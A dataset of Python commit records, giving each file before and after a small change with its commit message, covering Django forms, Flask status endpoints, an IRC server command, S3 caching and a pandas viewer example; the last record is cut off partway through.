| column | type |
|---|---|
| commit | string (length 40) |
| old_file | string (length 4 to 118) |
| new_file | string (length 4 to 118) |
| old_contents | string (length 0 to 2.94k) |
| new_contents | string (length 1 to 4.43k) |
| subject | string (length 15 to 444) |
| message | string (length 16 to 3.45k) |
| lang | string (1 class) |
| license | string (13 classes) |
| repos | string (length 5 to 43.2k) |
| prompt | string (length 17 to 4.58k) |
| response | string (length 1 to 4.43k) |
| prompt_tagged | string (length 58 to 4.62k) |
| response_tagged | string (length 1 to 4.43k) |
| text | string (length 132 to 7.29k) |
| text_tagged | string (length 173 to 7.33k) |
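The prompt, response, and text columns (and their `_tagged` variants) are derived: they concatenate old_contents, message, and new_contents, with the tagged forms wrapped in `<commit_before>`, `<commit_msg>`, and `<commit_after>` markers, so the rows below show each code cell once. As a minimal sketch of consuming rows with this schema; the file name `commits.jsonl` and the local JSONL layout are assumptions, not part of this card:

```python
# Sketch: read a local JSONL export of this dataset and inspect one row.
# The path "commits.jsonl" is hypothetical; point it at the real data file.
import json

with open("commits.jsonl", "r", encoding="utf-8") as fh:
    rows = [json.loads(line) for line in fh]

row = rows[0]
print(row["commit"])        # 40-character commit SHA
print(row["old_file"])      # path of the file before the change
print(row["subject"])       # first line of the commit message
print(row["new_contents"])  # file contents after the commit
```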
---

commit: 968c73805e5beff502955ad3dbb8aa86ee8bc0b7
old_file: freelancefinder/jobs/forms.py
new_file: freelancefinder/jobs/forms.py

old_contents:

```python
"""Forms for dealing with jobs/posts."""
from django import forms

from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag


class PostFilterForm(forms.Form):
    """Form for filtering the PostListView."""

    title = forms.CharField(required=False)
    is_job_posting = forms.BooleanField(required=False)
    is_freelance = forms.BooleanField(required=False)

    def __init__(self, *args, **kwargs):
        super(PostFilterForm, self).__init__(*args, **kwargs)
        self.helper = FormHelper()
        self.helper.form_class = 'form-inline'
        self.helper.form_method = 'get'
        self.helper.add_input(Submit('submit', 'Filter'))


class JobSearchForm(forms.Form):
    """Form for filtering the JobListView."""

    search = forms.CharField(required=False)
    tag = forms.ModelChoiceField(queryset=Tag.objects.all())

    def __init__(self, *args, **kwargs):
        super(JobSearchForm, self).__init__(*args, **kwargs)
        self.helper = FormHelper()
        self.helper.form_class = 'form-inline'
        self.helper.form_method = 'get'
        self.helper.add_input(Submit('submit', 'Search'))
```

new_contents:

```python
"""Forms for dealing with jobs/posts."""
from django import forms

from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from taggit.models import Tag


class PostFilterForm(forms.Form):
    """Form for filtering the PostListView."""

    title = forms.CharField(required=False)
    is_job_posting = forms.BooleanField(required=False)
    is_freelance = forms.BooleanField(required=False)

    def __init__(self, *args, **kwargs):
        super(PostFilterForm, self).__init__(*args, **kwargs)
        self.helper = FormHelper()
        self.helper.form_class = 'form-inline'
        self.helper.form_method = 'get'
        self.helper.add_input(Submit('submit', 'Filter'))


class JobSearchForm(forms.Form):
    """Form for filtering the JobListView."""

    search = forms.CharField(required=False)
    tag = forms.ModelChoiceField(queryset=Tag.objects.all(), required=False)

    def __init__(self, *args, **kwargs):
        super(JobSearchForm, self).__init__(*args, **kwargs)
        self.helper = FormHelper()
        self.helper.form_class = 'form-inline'
        self.helper.form_method = 'get'
        self.helper.add_input(Submit('submit', 'Search'))
```

subject: Tag is not required, of course
message: Tag is not required, of course
lang: Python
license: bsd-3-clause
repos: ScorpionResponse/freelancefinder,ScorpionResponse/freelancefinder,ScorpionResponse/freelancefinder
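The whole diff is the added `required=False` on the `tag` field. A quick sketch of what that flag changes, using a plain `ChoiceField` stand-in so it runs without a database or installed apps; the `Demo` form and its choices are invented for illustration, and `ModelChoiceField` treats emptiness the same way:

```python
# Hedged sketch: required=False makes an empty submission valid.
import django
from django.conf import settings

settings.configure()  # minimal standalone settings, no database needed
django.setup()

from django import forms


class Demo(forms.Form):
    tag = forms.ChoiceField(choices=[("py", "python")], required=False)


form = Demo(data={})    # form submitted with no tag at all
print(form.is_valid())  # True; with required=True this would be False
```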
---

commit: 99b96d2c0b82e186b9eaa13d2efe8b617c9cf3aa
old_file: registration/__init__.py
new_file: registration/__init__.py

old_contents:

```python
VERSION = (0, 9, 0, 'beta', 1)


def get_version():
    from django.utils.version import get_version as django_get_version
    return django_get_version(VERSION)  # pragma: no cover
```

new_contents:

```python
VERSION = (1, 0, 0, 'final', 0)


def get_version():
    "Returns a PEP 386-compliant version number from VERSION."
    assert len(VERSION) == 5
    assert VERSION[3] in ('alpha', 'beta', 'rc', 'final')

    # Now build the two parts of the version number:
    # main = X.Y[.Z]
    # sub = .devN - for pre-alpha releases
    #     | {a|b|c}N - for alpha, beta and rc releases

    parts = 2 if VERSION[2] == 0 else 3
    main = '.'.join(str(x) for x in VERSION[:parts])

    sub = ''
    if VERSION[3] != 'final':
        mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
        sub = mapping[VERSION[3]] + str(VERSION[4])

    return str(main + sub)
```

subject: Fix version number reporting so we can be installed before Django.
message: Fix version number reporting so we can be installed before Django.
lang: Python
license: bsd-3-clause
repos: dinie/django-registration,dinie/django-registration,FundedByMe/django-registration,FundedByMe/django-registration,Avenza/django-registration
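As a worked check of the rewritten logic for the committed `VERSION = (1, 0, 0, 'final', 0)`: the patch level is 0, so only two components are kept, and a 'final' release adds no suffix.

```python
# Replicates the body of the new get_version() for the committed VERSION tuple.
VERSION = (1, 0, 0, 'final', 0)

parts = 2 if VERSION[2] == 0 else 3               # patch level 0 -> "X.Y"
main = '.'.join(str(x) for x in VERSION[:parts])  # "1.0"

sub = ''                                          # 'final' gets no a/b/c suffix
if VERSION[3] != 'final':
    mapping = {'alpha': 'a', 'beta': 'b', 'rc': 'c'}
    sub = mapping[VERSION[3]] + str(VERSION[4])

print(main + sub)  # -> 1.0
```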
---

commit: 7d88c98fcf6984b07a8b085f8272868b1c23b29e
old_file: app/status/views.py
new_file: app/status/views.py

old_contents:

```python
from flask import jsonify, current_app

from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes


@status.route('/_status')
def status():
    db_status = status_for_all_indexes()
    if db_status['status_code'] == 200:
        return jsonify(
            status="ok",
            version=utils.get_version_label(),
            db_status=db_status
        )

    current_app.logger.exception("Error connecting to elasticsearch")
    return jsonify(
        status="error",
        version=utils.get_version_label(),
        message="Error connecting to elasticsearch",
        db_status=db_status
    ), 500
```

new_contents:

```python
from flask import jsonify, current_app

from . import status
from . import utils
from ..main.services.search_service import status_for_all_indexes


@status.route('/_status')
def status():
    db_status = status_for_all_indexes()
    if db_status['status_code'] == 200:
        return jsonify(
            status="ok",
            version=utils.get_version_label(),
            db_status=db_status
        )

    current_app.logger.exception("Error connecting to elasticsearch")
    return jsonify(
        status="error",
        version=utils.get_version_label(),
        message="Error connecting to elasticsearch",
        db_status={
            'status_code': 500,
            'message': db_status['message'][0]
        }
    ), 500
```

subject: Return correct message if elasticsearch fails to connect.
message: Return correct message if elasticsearch fails to connect.
lang: Python
license: mit
repos: alphagov/digitalmarketplace-search-api,alphagov/digitalmarketplace-search-api,RichardKnop/digitalmarketplace-search-api,RichardKnop/digitalmarketplace-search-api,RichardKnop/digitalmarketplace-search-api,RichardKnop/digitalmarketplace-search-api
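The fix stops echoing the raw db_status payload on failure and instead builds a minimal dict, surfacing only the first entry of `db_status['message']`. A toy illustration; the payload shape and the message text are assumptions inferred from how the new code indexes into it:

```python
# Assumed shape: status_for_all_indexes() returns a status code plus a
# sequence of messages; only the first message is passed through.
db_status = {'status_code': 500, 'message': ('connection refused',)}

payload = {
    'status_code': 500,
    'message': db_status['message'][0],
}
print(payload)  # {'status_code': 500, 'message': 'connection refused'}
```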
---

commit: 155476e8feb584fb802b2aed4266aec32d617f2a
old_file: app/status/views.py
new_file: app/status/views.py

old_contents:

```python
from flask import jsonify, current_app

from . import status
from . import utils
from .. import api_client


@status.route('/_status')
def status():
    api_response = utils.return_response_from_api_status_call(
        api_client.status
    )

    apis_wot_got_errors = []

    if api_response is None or api_response.status_code is not 200:
        apis_wot_got_errors.append("(Data) API")

    # if no errors found, return everything
    if not apis_wot_got_errors:
        return jsonify(
            status="ok",
            version=utils.get_version_label(),
            api_status=api_response.json(),
        )

    message = "Error connecting to the " \
              + (" and the ".join(apis_wot_got_errors)) \
              + "."

    current_app.logger.error(message)

    return jsonify(
        status="error",
        version=utils.get_version_label(),
        api_status=utils.return_json_or_none(api_response),
        message=message,
    ), 500
```

new_contents:

```python
from flask import jsonify, current_app

from . import status
from . import utils
from .. import api_client


@status.route('/_status')
def status():
    api_response = utils.return_response_from_api_status_call(
        api_client.status
    )

    apis_with_errors = []

    if api_response is None or api_response.status_code != 200:
        apis_with_errors.append("(Data) API")

    # if no errors found, return everything
    if not apis_with_errors:
        return jsonify(
            status="ok",
            version=utils.get_version_label(),
            api_status=api_response.json(),
        )

    message = "Error connecting to the " \
              + (" and the ".join(apis_with_errors)) \
              + "."

    current_app.logger.error(message)

    return jsonify(
        status="error",
        version=utils.get_version_label(),
        api_status=utils.return_json_or_none(api_response),
        message=message,
    ), 500
```

subject: Change variable name & int comparison.
message: Change variable name & int comparison.
lang: Python
license: mit
repos: alphagov/digitalmarketplace-supplier-frontend,mtekel/digitalmarketplace-supplier-frontend,alphagov/digitalmarketplace-supplier-frontend,alphagov/digitalmarketplace-supplier-frontend,mtekel/digitalmarketplace-supplier-frontend,mtekel/digitalmarketplace-supplier-frontend,mtekel/digitalmarketplace-supplier-frontend,alphagov/digitalmarketplace-supplier-frontend
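Besides the rename, the commit replaces `is not 200` with `!= 200`. That matters because `is` compares object identity, not value; CPython happens to cache small integers (including 200), so the old code usually worked by accident, but outside that cached range identity checks fail:

```python
# "is" tests identity, not equality. CPython caches ints in [-5, 256], so
# "x is 200" often works by accident; beyond that range it does not.
code = int("1000")   # built at runtime, outside the small-int cache
print(code == 1000)  # True  (value comparison, the correct check)
print(code is 1000)  # False (distinct objects; newer Pythons also warn)
```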
---

commit: 829cccc630c26f2e9d89007c669308c6b1bb63cf
old_file: frigg/worker/fetcher.py
new_file: frigg/worker/fetcher.py

old_contents:

```python
# -*- coding: utf8 -*-
import json
import threading
import time
import logging

from frigg.worker import config
from frigg.worker.jobs import Build

logger = logging.getLogger(__name__)


def fetcher():
    redis = config.redis_client()
    while redis:
        task = redis.rpop('frigg:queue')
        if task:
            __start_task(task)

        time.sleep(2)


def __start_task(json_string):
    task = json.loads(json_string)
    thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
    thread.daemon = True
    thread.start()
    logger.info('Started %s' % task)
    return thread


def __start_build(task):
    build = Build(task['id'], task)
    build.run_tests()
    del build
```

new_contents:

```python
# -*- coding: utf8 -*-
import json
import threading
import time
import logging

from frigg.worker import config
from frigg.worker.jobs import Build

logger = logging.getLogger(__name__)


def fetcher():
    redis = config.redis_client()
    while redis:
        task = redis.rpop('frigg:queue')
        if task:
            __start_task(task)

        time.sleep(2)


def __start_task(json_string):
    task = json.loads(json_string)
    thread = threading.Thread(name='build-%s' % task['id'], target=__start_build, args=[task])
    thread.daemon = True
    thread.start()
    logger.info('Started %s' % task)
    return thread


def __start_build(task):
    build = Build(task['id'], task)
    build.run_tests()
    for result in build.results:
        del result
    del build
```

subject: Add deletion of result after build
message: Add deletion of result after build
lang: Python
license: mit
repos: frigg/frigg-worker
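A side note on the pattern this commit introduces: `del` on a loop variable only removes the local name binding; it does not shrink `build.results` or free objects the list still references. A small illustration with an invented list:

```python
# "del item" unbinds the loop name; the list and its elements are untouched.
items = [object(), object()]
for item in items:
    del item      # next iteration simply rebinds the name

print(len(items))  # 2 -- nothing was removed from the list
```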
---

commit: cce8c4b40038a8b8ddccc76f7d13c7f5d0e5e566
old_file: txircd/modules/rfc/cmd_links.py
new_file: txircd/modules/rfc/cmd_links.py

old_contents:

```python
from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements


class LinksCommand(ModuleData, Command):
    implements(IPlugin, IModuleData, ICommand)

    name = "LinksCommand"
    core = True

    def userCommands(self):
        return [ ("LINKS", 1, self) ]

    def parseParams(self, user, params, prefix, tags):
        return {}

    def execute(self, user, data):
        for server in self.ircd.servers.itervalues():
            hopCount = 1
            nextServer = server.nextClosest
            while nextServer != self.ircd.serverID:
                nextServer = self.ircd.servers[nextServer].nextClosest
                hopCount += 1
            if server.nextClosest == self.ircd.serverID:
                nextClosestName = self.ircd.name
            else:
                nextClosestName = self.ircd.servers[server.nextClosest].name
            user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
        user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
        user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
        return True


linksCmd = LinksCommand()
```

new_contents:

```python
from twisted.plugin import IPlugin
from twisted.words.protocols import irc
from txircd.module_interface import Command, ICommand, IModuleData, ModuleData
from zope.interface import implements


class LinksCommand(ModuleData, Command):
    implements(IPlugin, IModuleData, ICommand)

    name = "LinksCommand"
    core = True

    def userCommands(self):
        return [ ("LINKS", 1, self) ]

    def parseParams(self, user, params, prefix, tags):
        return {}

    def execute(self, user, data):
        user.sendMessage(irc.RPL_LINKS, self.ircd.name, self.ircd.name, "0 {}".format(self.ircd.config["server_description"]))
        for server in self.ircd.servers.itervalues():
            hopCount = 1
            nextServer = server.nextClosest
            while nextServer != self.ircd.serverID:
                nextServer = self.ircd.servers[nextServer].nextClosest
                hopCount += 1
            if server.nextClosest == self.ircd.serverID:
                nextClosestName = self.ircd.name
            else:
                nextClosestName = self.ircd.servers[server.nextClosest].name
            user.sendMessage(irc.RPL_LINKS, server.name, nextClosestName, "{} {}".format(hopCount, server.description))
        user.sendMessage(irc.RPL_ENDOFLINKS, "*", "End of /LINKS list.")
        return True


linksCmd = LinksCommand()
```

subject: Make the order of LINKS output consistent
message: Make the order of LINKS output consistent
lang: Python
license: bsd-3-clause
repos: ElementalAlchemist/txircd,Heufneutje/txircd
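The hop count in `execute()` is computed by walking `nextClosest` pointers back to the local server. A toy rendition of that walk; the topology and server IDs A, B, C are invented for the example:

```python
# Toy topology: each entry maps a server ID to its nextClosest server.
servers = {"B": "A", "C": "B"}
my_id = "A"  # the local server's ID


def hops(server_id):
    count = 1
    nxt = servers[server_id]
    while nxt != my_id:  # follow nextClosest until we reach ourselves
        nxt = servers[nxt]
        count += 1
    return count


print(hops("C"))  # 2: C -> B -> A
```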
---

commit: f0e11b0743c2779f61970917da6eef859149f600
old_file: taar/recommenders/utils.py
new_file: taar/recommenders/utils.py

old_contents:

```python
import json
import os
from tempfile import gettempdir

import boto3
from botocore.exceptions import ClientError
import requests


def fetch_json(uri):
    """ Perform an HTTP GET on the given uri, return the results as json.

    Args:
        uri: the string URI to fetch.
    Returns:
        A JSON object with the response or None if the status code of the
        response is an error code.
    """
    r = requests.get(uri)
    if r.status_code != requests.codes.ok:
        return None

    return r.json()


def get_s3_json_content(s3_bucket, s3_key):
    """Download and parse a json file stored on AWS S3.

    The file is downloaded and then cached for future use.
    """
    local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
    local_path = os.path.join(gettempdir(), local_filename)

    if not os.path.exists(local_path):
        with open(local_path, 'wb') as data:
            try:
                s3 = boto3.client('s3')
                s3.download_fileobj(s3_bucket, s3_key, data)
            except ClientError:
                return None

        with open(local_path, 'r') as data:
            return json.loads(data.read())
```

new_contents:

```python
import json
import os
from tempfile import gettempdir

import boto3
from botocore.exceptions import ClientError
import requests


def fetch_json(uri):
    """ Perform an HTTP GET on the given uri, return the results as json.

    Args:
        uri: the string URI to fetch.
    Returns:
        A JSON object with the response or None if the status code of the
        response is an error code.
    """
    r = requests.get(uri)
    if r.status_code != requests.codes.ok:
        return None

    return r.json()


def get_s3_json_content(s3_bucket, s3_key):
    """Download and parse a json file stored on AWS S3.

    The file is downloaded and then cached for future use.
    """
    local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
    local_path = os.path.join(gettempdir(), local_filename)

    if not os.path.exists(local_path):
        with open(local_path, 'wb') as data:
            try:
                s3 = boto3.client('s3')
                s3.download_fileobj(s3_bucket, s3_key, data)
            except ClientError:
                return None

    with open(local_path, 'r') as data:
        return json.loads(data.read())
```

subject: Make sure to load the S3 cache file when available
message: Make sure to load the S3 cache file when available
lang: Python
license: mpl-2.0
repos: maurodoglio/taar
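The diff here is pure indentation, reconstructed from the commit message: the final read used to sit inside the `if not os.path.exists(...)` block, so an already-cached file was never loaded; dedenting it makes the read happen either way. As a small illustration of the cache-path scheme the function uses; the bucket and key names are invented:

```python
# Mirrors the local_filename/local_path construction in get_s3_json_content.
import os
from tempfile import gettempdir

s3_bucket = "telemetry-example"     # hypothetical bucket
s3_key = "taar/models/latest.json"  # hypothetical key

local_filename = '_'.join([s3_bucket, s3_key]).replace('/', '_')
print(os.path.join(gettempdir(), local_filename))
# e.g. /tmp/telemetry-example_taar_models_latest.json
```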
60c62cea5d0775ce443280c0973ce323d26eaa28
|
app/main/errors.py
|
app/main/errors.py
|
# coding=utf-8
from flask import render_template
from . import main
from dmapiclient import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
# coding=utf-8
from flask import render_template
from . import main
from ..api_client.error import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
Change app-level error handler to use api_client.error exceptions
|
Change app-level error handler to use api_client.error exceptions
|
Python
|
mit
|
AusDTO/dto-digitalmarketplace-buyer-frontend,AusDTO/dto-digitalmarketplace-buyer-frontend,AusDTO/dto-digitalmarketplace-buyer-frontend,AusDTO/dto-digitalmarketplace-buyer-frontend
|
# coding=utf-8
from flask import render_template
from . import main
from dmapiclient import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
Change app-level error handler to use api_client.error exceptions
|
# coding=utf-8
from flask import render_template
from . import main
from ..api_client.error import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
<commit_before># coding=utf-8
from flask import render_template
from . import main
from dmapiclient import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
<commit_msg>Change app-level error handler to use api_client.error exceptions<commit_after>
|
# coding=utf-8
from flask import render_template
from . import main
from ..api_client.error import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
# coding=utf-8
from flask import render_template
from . import main
from dmapiclient import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
Change app-level error handler to use api_client.error exceptions# coding=utf-8
from flask import render_template
from . import main
from ..api_client.error import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
<commit_before># coding=utf-8
from flask import render_template
from . import main
from dmapiclient import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
<commit_msg>Change app-level error handler to use api_client.error exceptions<commit_after># coding=utf-8
from flask import render_template
from . import main
from ..api_client.error import APIError
@main.app_errorhandler(APIError)
def api_error_handler(e):
return _render_error_page(e.status_code)
@main.app_errorhandler(404)
def page_not_found(e):
return _render_error_page(404)
@main.app_errorhandler(500)
def internal_server_error(e):
return _render_error_page(500)
@main.app_errorhandler(503)
def service_unavailable(e):
return _render_error_page(503, e.response)
def _render_error_page(status_code, error_message=None):
templates = {
404: "errors/404.html",
500: "errors/500.html",
503: "errors/500.html",
}
if status_code not in templates:
status_code = 500
return render_template(
templates[status_code],
error_message=error_message
), status_code
|
0b2cf0a651d27af90a229d85f77ac9ebd2502905
|
run_test_BMI_ku_model.py
|
run_test_BMI_ku_model.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
print x._values["ALT"][:]
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
# print x._values["ALT"][:]
print x.get_value('soil__active_layer_thickness')
|
Use BMI method to get ALT value
|
Use BMI method to get ALT value
It looks like it may not give the correct answer, though.
|
Python
|
mit
|
permamodel/permamodel,permamodel/permamodel
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
print x._values["ALT"][:]
Use BMI method to get ALT value
It looks like it may not give the correct answer, though.
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
# print x._values["ALT"][:]
print x.get_value('soil__active_layer_thickness')
|
<commit_before>#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
print x._values["ALT"][:]
<commit_msg>Use BMI method to get ALT value
It looks like it may not give the correct answer, though.<commit_after>
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
# print x._values["ALT"][:]
print x.get_value('soil__active_layer_thickness')
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
print x._values["ALT"][:]
Use BMI method to get ALT value
It looks like it may not give the correct answer, though.#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
# print x._values["ALT"][:]
print x.get_value('soil__active_layer_thickness')
|
<commit_before>#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
print x._values["ALT"][:]
<commit_msg>Use BMI method to get ALT value
It looks like it may not give the correct answer, though.<commit_after>#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 10 10:56:16 2017
@author: kangwang
"""
import os
import sys
from permamodel.components import bmi_Ku_component
from permamodel.tests import examples_directory
cfg_file = os.path.join(examples_directory, 'Ku_method.cfg')
x = bmi_Ku_component.BmiKuMethod()
x.initialize(cfg_file)
x.update()
x.finalize()
# print x._values["ALT"][:]
print x.get_value('soil__active_layer_thickness')
|
7f4876b1b220b8c3c26ce1490a76adf9721da4da
|
sample/pandas-example.py
|
sample/pandas-example.py
|
#!/usr/bin/env python
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
gtabview.view(df)
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
import gtabview
c_arr = [['bar', 'bar', 'baz', 'baz', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
columns = pd.MultiIndex.from_tuples(list(zip(*c_arr)), names=['V1', 'V2'])
i_arr = [['bar', 'bar', 'bar', 'bar', 'baz', 'baz', 'baz', 'baz'],
['foo', 'foo', 'qux', 'qux', 'foo', 'foo', 'qux', 'qux'],
['one', 'two', 'one', 'two', 'one', 'two', 'one', 'two']]
index = pd.MultiIndex.from_tuples(list(zip(*i_arr)), names=['H1', 'H2', 'H3'])
df = pd.DataFrame(np.random.randn(8, 8), columns=columns, index=index)
